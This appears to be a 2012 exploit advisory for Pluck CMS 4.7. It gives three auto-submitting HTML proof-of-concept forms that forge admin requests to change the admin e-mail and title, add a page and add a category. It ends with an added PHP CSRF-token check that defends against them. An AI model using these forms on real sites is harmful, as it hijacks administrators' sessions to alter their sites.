Pluck CMS 4.7 Multiple CSRF Vulnerabilities



EKU-ID: 1464 CVE: OSVDB-ID:
Author: Gordon Security Published: 2012-02-10 Verified: Verified


# Exploit Title: Pluck cms multiple vulnerabilities
# Date: 09/01/2012
# Author: Gordon Security
# Vendor or Software Link: www.pluck-cms.org
# Version: 4.7
# Category: webapps
# Website: www.gordon-security.blogspot.com
C.S.R.F. #1
#[p.o.c.] Change admin e-mail and change title blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to change Admin E-mail and Blog Title</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=settings">
<input type="hidden" name="cont1" value="Gordon Security"/>
<input type="hidden" name="cont2" value="gordon_@hotmail.it"/>
<input type="hidden" name="save" value="Salva"/>
</form>
</body>
</html>
C.S.R.F. #2
#[p.o.c.] Add page to blog
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to add page</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=editpage">
<input type="hidden" name="title" value="Exploit"/>
<input type="hidden" name="content" value="<p>Exploited</p>"/>
<input type="hidden" name="description" value=""/>
<input type="hidden" name="keywords" value=""/>
<input type="hidden" name="hidden" value="no"/>
<input type="hidden" name="sub_page" value=""/>
<input type="hidden" name="theme" value="default"/>
<input type="hidden" name="save_exit" value="Save and Exit"/>
</form>
</body>
</html>
C.S.R.F. #3
#[p.o.c.] Add category
<html>
<title>Gordon Security</title>
<body onload="javascript:document.forms[0].submit()">
<H3>www.gordon-security.blogspot.com</H3>
<H2>CSRF Exploit to add categorie</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?module=blog">
<input type="hidden" name="cont1" value="Hacking"/>
<input type="hidden" name="Submit" value="Salva"/>
</form>
</body>
</html>
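
A server-side check that would refuse all three forged forms above, shown as an added example (not part of the original advisory and not Pluck's own code): a per-session synchronizer token compared in constant time. The function names and the `csrf_token` field name are assumptions made for illustration.

```php
<?php
// Added example: synchronizer-token check for state-changing admin requests.
// csrf_token(), csrf_field() and csrf_valid() are hypothetical names, not Pluck functions.
declare(strict_types=1);

// Return the token bound to this session, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in every admin form (settings, editpage, blog category).
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES) . '"/>';
}

// True only when the POST body carries the token stored in the session.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed sample input: the field set submitted by the settings form above,
// next to the same fields posted from a form the admin page rendered itself.
$session = [];
$token   = csrf_token($session);
$forged  = ['cont1' => 'Gordon Security', 'cont2' => 'gordon_@hotmail.it', 'save' => 'Salva'];
$genuine = $forged + ['csrf_token' => $token];
$guessed = ['csrf_token' => str_repeat('0', 64)] + $forged;

var_dump(csrf_valid($session, $forged));   // cross-site form: carries no token
var_dump(csrf_valid($session, $genuine));  // same-site form: token matches the session
var_dump(csrf_valid($session, $guessed));  // attacker-chosen token: does not match
```

In a real deployment the check would be called with `$_SESSION` and `$_POST` before any handler for `action=settings`, `action=editpage` or `module=blog` acts on the request, answering with HTTP 403 when it fails.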